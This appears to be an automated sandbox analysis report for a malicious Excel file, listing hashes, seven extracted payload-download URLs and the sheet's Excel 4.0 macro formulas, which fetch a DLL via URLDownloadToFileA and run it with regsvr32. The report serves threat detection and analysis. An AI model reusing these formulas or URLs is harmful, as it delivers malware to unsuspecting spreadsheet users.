General
-
Target
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
Size
33KB
-
Sample
240909-12gfsasfpj
-
MD5
325803f2534dac63d8d714da437fad96
-
SHA1
e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe
-
SHA256
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
SHA512
72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b
-
SSDEEP
768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5
Static task
static1
Behavioral task
behavioral1
Sample
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
https://damjangro.org/data/IlBcH2mM/
https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
https://www.awam.be/wp-admin/ug9Zz/
https://protokol.mx/Archivos/SjKWNoeYre/
https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
https://bengtverhoef.nl/stats/SJ1csD7/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Targets
-
-
Target
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
Size
33KB
-
MD5
325803f2534dac63d8d714da437fad96
-
SHA1
e3614f4c8e0934e85fa62ebdbed3fe9df50cb1fe
-
SHA256
5ff6161f31e2d0fa83664d8e2edd029a61eb18ca3339e7c586a92481592ff9f6
-
SHA512
72dc47a8477ba519475d6b9e7d760f7064b07674a5c7e9aa011883ea09bd275047c2f528d7e44649e7e21af86b2d94b9cfda0e2caebe03c70b46db9e8661957b
-
SSDEEP
768:LC+3ocveEI8vp96wU1+FCh+JJwthS0U8GueOxhbpL5:G+3ozuT6Z4FLLwtDmKpL5
Score3/10 -